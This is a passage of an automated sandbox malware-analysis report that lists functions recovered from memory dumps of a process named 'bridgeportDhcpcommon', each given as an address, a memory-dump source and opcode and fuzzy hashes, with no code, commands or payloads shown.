                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction ID: e977cd1362a9d23ade79f9f437f1636cba2e7f455eba951d8196d6cc27200e2a
                                                                                                                                  • Opcode Fuzzy Hash: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction Fuzzy Hash: 30E0927060E3C44FC71AEB3488688547F60EF6B20134A42EFC045CF2A7EA2DC885C701
                                                                                                                                  Function 00007FFD9BAD29F9 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 861a552fa676ef2c39f2ebf40fd8b8f06f9107aafbcada9c16295871aef5436f
                                                                                                                                  • Instruction ID: 26fab0ef578798732123e5fe0a8b06ba9a773684830b40befe95939e059cf375
                                                                                                                                  • Opcode Fuzzy Hash: 861a552fa676ef2c39f2ebf40fd8b8f06f9107aafbcada9c16295871aef5436f
                                                                                                                                  • Instruction Fuzzy Hash: DEE06D3164E3C04FCB16AB3488688547F60AE6720174A42EEC086CF1A3DA2DC88AC701
                                                                                                                                  Function 00007FFD9BAC5A71 Relevance: .0, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0eee5d3a3a32375f6dd06d586ec933c86634b1eb35b131c28d22c4b1caeee0c3
                                                                                                                                  • Instruction ID: 98562d136d9939b6fc75dcf4a82d6f57455fcc7103663bccb9c7407ad337187c
                                                                                                                                  • Opcode Fuzzy Hash: 0eee5d3a3a32375f6dd06d586ec933c86634b1eb35b131c28d22c4b1caeee0c3
                                                                                                                                  • Instruction Fuzzy Hash: 36E017A190F7C51FD70663B9082E0A4BFA0AD2721138E05EFC0CACB0B3D95E084A8302
                                                                                                                                  Function 00007FFD9BADB3E0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FFD9BAD2A89 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 177251aa6206ce8e389de9cc672da9d957a76d513835ee17510b0b1d03f5325e
                                                                                                                                  • Instruction ID: 40103d3a0a41b0dbd73d840d31fc3ea5f75458c10d5045f3bafa6584c678b927
                                                                                                                                  • Opcode Fuzzy Hash: 177251aa6206ce8e389de9cc672da9d957a76d513835ee17510b0b1d03f5325e
                                                                                                                                  • Instruction Fuzzy Hash: ACE01A7154A3C04FCB06AB7484A99843F709E6721078A41DEC049CF1B3D62E894AC701
                                                                                                                                  Function 00007FFD9BADB999 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction ID: 4929fa9a8e8ba247497b108c220b0c488c8901d046e331d6e67b1d87e26d4ff2
                                                                                                                                  • Opcode Fuzzy Hash: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction Fuzzy Hash: E0E01A7154E3C48FCB06EB7488A59443F60AE6B21078B41EEC145CF1B3E62D8849C701
                                                                                                                                  Function 00007FFD9BAD8874 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06f7bfe94e6c3545b098f8a879e5f3c834bb8bff79a6e01d6551a03bed15286b
                                                                                                                                  • Instruction ID: 13c2d47eb2b664cb2235ac0c066b1399d260a07b3aee49c551055595d5ff528b
                                                                                                                                  • Opcode Fuzzy Hash: 06f7bfe94e6c3545b098f8a879e5f3c834bb8bff79a6e01d6551a03bed15286b
                                                                                                                                  • Instruction Fuzzy Hash: 73E0653098F7C04FC70B873488B88887FB0EE4721474A80EEC0858B0A3DA298809C702
                                                                                                                                  Function 00007FFD9BADB470 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FFD9BAB3A90 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                                  • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                                  • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                                  • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                                  Function 00007FFD9BADE3B9 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction ID: c2b01c04f928777a0e668d230f27660419bee7da6d3b12f1bd017861ce245802
                                                                                                                                  • Opcode Fuzzy Hash: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction Fuzzy Hash: 5DE04F2154F3C04FC70B973088A88803F60DE2721034A40EAC145CF2B3E5298C49C711
                                                                                                                                  Function 00007FFD9BADE339 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction ID: 7a5d4e4c5c284cae1d0a98378bbaddce979002e6a2a82d53d0b2d228632deb92
                                                                                                                                  • Opcode Fuzzy Hash: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction Fuzzy Hash: 23E0462294F3C44FC70B9B3088A88803F60DE6B21038A40EAC185CF2B3EA298C49C712
                                                                                                                                  Function 00007FFD9BAA5906 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: d7e3dd96e30b9d43b5d2dc38ed30cab640a7ab2438f1c62fc4c931b52efdf37b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 93E01230F0D11E8AF774A755D8607B962629F94704F5600B5D40ED32E2DDB86F418A55
                                                                                                                                  Function 00007FFD9BAD2AA0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FFD9BADC678 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction ID: b32eab7c9bc4b7e74645761e53194022764afd2861dcc3217c0a303523c631e1
                                                                                                                                  • Opcode Fuzzy Hash: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction Fuzzy Hash: 07D02230B508040FCB0CA738885C8303390EBAA20278600A8D00AC73B1D96ADC88CB80
                                                                                                                                  Function 00007FFD9BAD7DC0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bad2000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction ID: 15b43eca4ff2acd1d2eced378d129677e904d30cf21e5492986ab00f519a9323
                                                                                                                                  • Opcode Fuzzy Hash: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction Fuzzy Hash: 77D01234B619044FC71CB738885987473A1EBAA216B9541A9D00AC72B1D96ADD89C741
                                                                                                                                  Function 00007FFD9BAB4080 Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5a153f008b8d450a4cf97b94138aa7291363222cff1c0ddf69de5a4c96c2bca5
                                                                                                                                  • Instruction ID: 247d68e027c9420e4a2a76394d54e2c3751fbd7763c9ab25342e88658d8bd11e
                                                                                                                                  • Opcode Fuzzy Hash: 5a153f008b8d450a4cf97b94138aa7291363222cff1c0ddf69de5a4c96c2bca5
                                                                                                                                  • Instruction Fuzzy Hash: 24E08C32E0440E4BEB18EF84C4A0AFD3BF1AF48304F00013AE029E62E5DE7428814B10
                                                                                                                                  Function 00007FFD9BAB47C5 Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction ID: 693cc6325eff473f90e08535aeacc7b152b97be437aed018cb3775b3459b9de1
                                                                                                                                  • Opcode Fuzzy Hash: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction Fuzzy Hash: DDD0A730F0881F4BE659EF48946426A6251FF44300F120039D81DC3167DE34E9118A40
                                                                                                                                  Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Function 00007FFD9BAA12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Function 00007FFD9BAC5A90 Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bac3000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Function 00007FFD9BAA460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f7a3b901470a638a08146a028bd1359cdd7a4822b67a7325f6711743c4a01083
                                                                                                                                  • Instruction ID: 880ba756eb9af5ae29679388ebbb4a3ffe5d4315ad9efc70ba0d3d57ab9991e9
                                                                                                                                  • Opcode Fuzzy Hash: f7a3b901470a638a08146a028bd1359cdd7a4822b67a7325f6711743c4a01083
                                                                                                                                  • Instruction Fuzzy Hash: 09C08C01F0C81A12F31922040421ABD04424F4471CF880034F00EC72CECE1C5A0202C6
                                                                                                                                  Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9baa0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Function 00007FFD9BAB9595 Relevance: .0, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000025.00000002.2114990524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9bab0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction ID: e3ef123d9a2e456fd85f6baed8a656f05d0499f799ba2a21d6a2caedea0dda8f
                                                                                                                                  • Opcode Fuzzy Hash: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction Fuzzy Hash: E4B09224A0911A8BE7209B8084303AA22429B44310F224431A82D832DBDBA8A90086A1

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BAD0D74 Relevance: .3, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e577be885b508604c0e047c8af13a4fa4029d636a46edf93d7caaa7513130d0c
                                                                                                                                  • Instruction ID: 5da38debcb41220b8919076ac637b981868e020c68795386bdf360006042a7ef
                                                                                                                                  • Opcode Fuzzy Hash: e577be885b508604c0e047c8af13a4fa4029d636a46edf93d7caaa7513130d0c
                                                                                                                                  • Instruction Fuzzy Hash: 53918271A19A8E4FD798DB6888757A97FE1FF99314F40027EE059EB2D6CBB81401C740
                                                                                                                                  Function 00007FFD9BAD0B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction ID: c8b2876f24e66c58ff6c243e4cc2f73b8dee7b4830f7dfc600d1b3de266f8ca2
                                                                                                                                  • Opcode Fuzzy Hash: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction Fuzzy Hash: 1001263632A95A8FC702AB7DE8914E8BB50EA83132BD602FBD044CB1A1E311185EC7D1
                                                                                                                                  Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 153COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 392507325debd9933642d29706e6cee57b8ef3f39f9044ef68c86df4ed2b8ae9
                                                                                                                                  • Instruction ID: 9d271665fb80e9df0629dd7bba1400346f8683c6df1e2b9aacee2ea38f509a4d
                                                                                                                                  • Opcode Fuzzy Hash: 392507325debd9933642d29706e6cee57b8ef3f39f9044ef68c86df4ed2b8ae9
                                                                                                                                  • Instruction Fuzzy Hash: 78412B21B0C9190AE315F7AC64A66F97781DF9833AB4442BBE40ECB1EBDD185841C285
                                                                                                                                  Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1351c527c6bbf3a3301abab4a072a968eda75cd8f770339bdc104fd130b93b92
                                                                                                                                  • Instruction ID: febb75f8d380d8f44648f87521ba6680a914faf478956cdde5aad8eb02bad41d
